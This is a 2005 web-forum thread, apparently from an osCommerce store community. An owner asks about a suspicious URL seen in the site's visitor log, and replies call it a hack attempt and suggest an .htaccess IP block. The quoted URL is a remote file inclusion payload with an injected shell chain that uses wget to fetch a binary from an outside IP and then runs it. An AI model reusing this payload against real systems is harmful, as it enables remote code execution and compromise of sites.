enragedcow Posted December 23, 2005 Share Posted December 23, 2005 Occasionally, I've been checking the "who's online", and where it shows what URL on our store they are currently at, I've seen this: index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://81.174.26.111/cmd.gif?&cmd=cd%20/tmp;wget%20128.173.40.113/listen;chmod%20744%20listen;./listen;echo%20YYY;echo| It looks to me like someone is trying to get the configuration info, or something... so I checked the IP listed in that string, (http://81.174.26.111/) and sure enough, it looks like a questionable site. Anyone know what any of that string in the URL means? I'm hoping we aren't getting nailed or anything.... Thanks! "People tell me I have an inferiority complex. They must be right; after all, they are all smarter than me." Link to comment Share on other sites More sharing options...
♥Vger Posted December 23, 2005 Share Posted December 23, 2005 Block that IP via a .htaccess file in the root of your web, as in: order allow,deny deny from 81.174.26.111 allow from all And "Yes" it is a hack attempt. Vger Link to comment Share on other sites More sharing options...
enragedcow Posted December 23, 2005 Author Share Posted December 23, 2005 Block that IP via a .htaccess file in the root of your web, as in: order allow,deny deny from 81.174.26.111 allow from all And "Yes" it is a hack attempt. Vger Great, thanks for the info. Out of curiosity, do you know what exactly that's trying to accomplish? And is it something I should be worried about? "People tell me I have an inferiority complex. They must be right; after all, they are all smarter than me." Link to comment Share on other sites More sharing options...
Guest Posted December 23, 2005 Share Posted December 23, 2005 there many references about it like http://secunia.com/advisories/14337/ but you shouldn't worry since you're using osc, right? Link to comment Share on other sites More sharing options...
mystery Posted December 26, 2005 Share Posted December 26, 2005 Today I noticed the same thing on my site, but with a different ip 60.36.13.35 Luckily I was online and check who's inline that I noticed, but what if I wasn't online how do I know somebody tried and succeeded, what do I need to check? Denice Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.